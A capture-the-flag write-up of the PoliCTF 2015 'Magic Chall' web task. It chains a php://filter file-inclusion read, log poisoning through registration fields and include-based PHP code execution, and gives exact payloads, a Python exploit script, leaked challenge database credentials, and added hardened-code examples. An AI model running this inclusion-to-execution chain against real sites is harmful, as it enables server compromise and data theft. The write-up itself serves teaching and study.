
Sunday, 12 July 2015

PoliCTF 2015: Magic Chall (Web) Write-up


Description:
I visit this website when I'm sad; it contains many magical things that help me find the solution. Focus on your problem and find "the magic thing" that will help you solve it.
Solution:

1. Go to http://magic.polictf.it/index.php?page=register. I tried Local File Inclusion in the "page" parameter with the base64-encode PHP filter,
e.g. http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index, and read all the PHP files.



2. The /index.php file:
if(isset($_POST["login"])){
 if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
  $user = new User($_POST["username"], $_POST["password"]);
  $login = $user -> login();
  if($login){
   $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
   $logger -> log_access();
   header("Location: magic_things.php");
  }
 }
}
The gethostbyaddr() function resolves my IP address to its hostname (reverse DNS), so I went to http://ipinfo.io/ and got my hostname. :)

3. /classes/logger/logger.php, in __construct I see...
 public function __construct($host, $user){
  $this -> host = $host;
  $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
  $this -> user = $user;
  date_default_timezone_set("UTC");
 } 
The log_access() and initLogFile() functions use fwrite() to write the log file. That means the /log folder contains a log file whose name is my hostname, an underscore, and the surname I entered at registration,
e.g. http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname

So I can write a file. :D

4. Back to index.php:
  <div id="content">
   <?php 
    include($page.".php");
   ?>
  </div>
The include() function will execute PHP code!!
So in the "surname" field I set name.php.
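The include($page.".php") line above is the root of the whole chain: it accepts a php://filter wrapper (step 1) and a path into the web-writable log/ directory (step 4). As an added example that is not part of the challenge's code, here is that routing shown in its vulnerable form beside an allowlist-based form; the resolve_page() helper, the pages/ directory and the four page names are assumptions for the demo.

```php
<?php
// Added example (not from the challenge's code): the page-routing include from
// index.php, shown as the vulnerable form and a hardened form.

// Vulnerable form, equivalent to the challenge's include($page.".php"):
// $page comes straight from the query string, so php://filter/..., ../ and
// a path into the web-writable log/ directory are all accepted as-is.
function render_page_vulnerable(string $page): void
{
    include($page . ".php");
}

// Hardened form: route through a fixed allowlist, never through the raw string.
// Only these page names and this pages/ directory are assumed for the demo.
const ALLOWED_PAGES = [
    'index'        => __DIR__ . '/pages/index.php',
    'register'     => __DIR__ . '/pages/register.php',
    'login'        => __DIR__ . '/pages/login.php',
    'magic_things' => __DIR__ . '/pages/magic_things.php',
];

function resolve_page(?string $page): ?string
{
    // Unknown, empty or wrapper-style values (php://..., ../, log/...) never match a key,
    // so the user-supplied string is only ever used as a lookup, never as a path.
    if ($page === null || !array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }
    return ALLOWED_PAGES[$page];
}

function render_page_hardened(?string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page";
        return;
    }
    include $path;
}

// Offline check of the resolver with constructed inputs, including the two
// values used in this write-up.
foreach ([
    'register',
    'php://filter/convert.base64-encode/resource=index',
    'log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom',
    '../../etc/passwd',
] as $candidate) {
    $resolved = resolve_page($candidate);
    printf("%-55s -> %s\n", $candidate, $resolved ?? 'REJECTED');
}
```

Only the first candidate resolves; the filter wrapper, the log path and the traversal string are all rejected before anything reaches include. An allowlist is preferable to blocklisting "php://" or "../", because the set of wrappers and encodings PHP accepts is larger than any blocklist tends to cover.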

5. In the "name" and "surname" fields I can put PHP code, e.g. <?php phpinfo(); ?>; I chose to put the PHP code in the "name" field.
 public function log_access(){
  $active = $this -> user -> isActive();
  if(!$active){
   $this -> initLogFile();
  }
  $fo = fopen($this -> filename, 'a');
  if($fo){
   $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
   fclose($fo);
   if($write)
    return true;
   else
    return false;
  }
 }
 
 public function initLogFile(){
  $fo = fopen($this -> filename, 'w+');
  if($fo){
   $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile.
   fclose($fo);
   if($write){
    $this -> user -> setActiveBit(1);
    return true;
   }
   else
    return false;
  }
 }
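The Logger above writes attacker-chosen text (name, surname) into a file whose name is also attacker-influenced (reverse-DNS hostname plus surname) and that sits under DOCUMENT_ROOT, which is why the include in step 4 can reach it. As an added example that is not the challenge's Logger class, here is a log writer that removes both properties; the SafeLogger class, its methods and the LOG_DIR path are assumptions for the demo.

```php
<?php
// Added example, not the challenge's Logger class: a log writer that closes the
// two holes used in this write-up, the attacker-influenced file name and the
// attacker-chosen file contents inside the document root.

const LOG_DIR = '/var/log/magicchall';   // assumed path: outside DOCUMENT_ROOT, never served by the web server

final class SafeLogger
{
    private string $filename;

    public function __construct(string $remoteAddr, string $username)
    {
        // Build the file name only from values the client cannot choose freely:
        // the validated client IP and a hash of the username. No reverse-DNS
        // hostname and no surname, so a value such as "icheernoom.php" can never
        // become part of the path.
        if (filter_var($remoteAddr, FILTER_VALIDATE_IP) === false) {
            throw new InvalidArgumentException('invalid remote address');
        }
        $safeAddr = str_replace(':', '_', $remoteAddr);   // IPv6 colons are awkward in file names
        $this->filename = LOG_DIR . '/' . $safeAddr . '_' . hash('sha256', $username) . '.log';
        date_default_timezone_set('UTC');
    }

    public function filename(): string
    {
        return $this->filename;
    }

    // One JSON object per line. JSON_HEX_TAG turns "<" and ">" into \u003C and \u003E,
    // so a submitted name of "<?php phpinfo(); ?>" is stored without a literal
    // "<?php" open tag. The location outside the web root is the primary control;
    // this encoding is defence in depth in case the file is ever read by PHP.
    public static function formatRecord(string $event, array $fields): string
    {
        $record = ['ts' => date('c'), 'event' => $event] + $fields;
        return json_encode($record, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES | JSON_THROW_ON_ERROR) . "\n";
    }

    public function write(string $event, array $fields = []): bool
    {
        $line = self::formatRecord($event, $fields);
        return file_put_contents($this->filename, $line, FILE_APPEND | LOCK_EX) !== false;
    }
}

// Offline demonstration with constructed values; nothing is written to disk here.
$logger = new SafeLogger('203.0.113.7', 'icheernoom');
echo $logger->filename(), "\n";
echo SafeLogger::formatRecord('register', [
    'name'    => '<?php phpinfo(); ?>',
    'surname' => 'icheernoom.php',
]);
```

The printed record carries the name field as "\u003C?php phpinfo(); ?\u003E", and the file name contains neither the surname nor any client-controlled hostname. Combined with a page allowlist in index.php, the log file is both unreachable through include and harmless if it were reached.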
6. In /classes/magic/magic.php, I use the LFI-to-remote-code-execution chain to call the __call function.
 public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
  $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
  $stmt = $mysqli->prepare("SELECT word FROM magic_word");
  $stmt -> execute();
  $stmt -> store_result();
  $stmt -> bind_result($magic_word);
  $stmt -> fetch();
  echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
  session_destroy();
 }

Exploitation:

Step 1: Register - http://magic.polictf.it/index.php?page=register

Name: <?php $magic = new Magic(); $magic->__call(); ?>
Surname: icheernoom.php
User: icheernoom
Password: icheernoom

Step 2: Login - http://magic.polictf.it/index.php?page=login

User: icheernoom
Password: icheernoom

Step 3: Access http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom

Get the flag!
  <div id="content">
   name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
  </div>
My automation script:

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
import urllib, urllib2, re, sys, socket, random

if len(sys.argv) < 2:
    print "Usage: {0} {1}".format(sys.argv[0], "\"<?php phpinfo(); ?>\"")
    sys.exit()

host = socket.gethostbyaddr("127.0.0.1")[0]  # change to your ip; must match the server's reverse lookup
url_register = 'http://magic.polictf.it/index.php?page=register'
url_login = 'http://magic.polictf.it/index.php?page=login'
url_log = 'http://magic.polictf.it/index.php?page=log/{0}'.format(host)
random = str(random.randint(100,10000))  # random id reused as surname, username and password
name = sys.argv[1]                       # PHP payload that ends up in the log file header
surname = "{0}.php".format(random)       # ".php" so the log file name is log/<host>_<random>.php
username = random
password = random

def register(name, surname, username, password):
    post_data = urllib.urlencode({'name' : name, 'surname' : surname, 'username' : username, 'password' : password, 'register' : 'send'})
    req = urllib2.Request(url_register, post_data)
    resp = urllib2.urlopen(req).read()

def login(username, password):
    post_data = urllib.urlencode({'username' : username, 'password' : password, 'login' : 'login'})
    req = urllib2.Request(url_login, post_data)
    resp = urllib2.urlopen(req).read()

def exploit(url_log, surname):
    # include() appends ".php" itself, so request the name without the extension
    log_path = "{0}_{1}".format(url_log, surname.replace(".php",""))
    req = urllib2.Request(log_path)
    resp = urllib2.urlopen(req).read()
    return resp

print "[*] Register with username: {0}".format(username)
register(name, surname, username, password)
print "[*] Login"
login(username, password)
print "[*] Exploit"
content = exploit(url_log, surname)
result = re.search('name\|(.*)\;surname', content, re.DOTALL)
print "[*] Result: \n",result.group(1)
'''
root@ubuntu:~# python web350.py "<?php $magic = new Magic(); $magic->__call(); ?>"
[*] Register with username: 1337
[*] Login
[*] Exploit
[*] Result:
I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
'''

Explorer: (images not included)

and more...

Flag: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
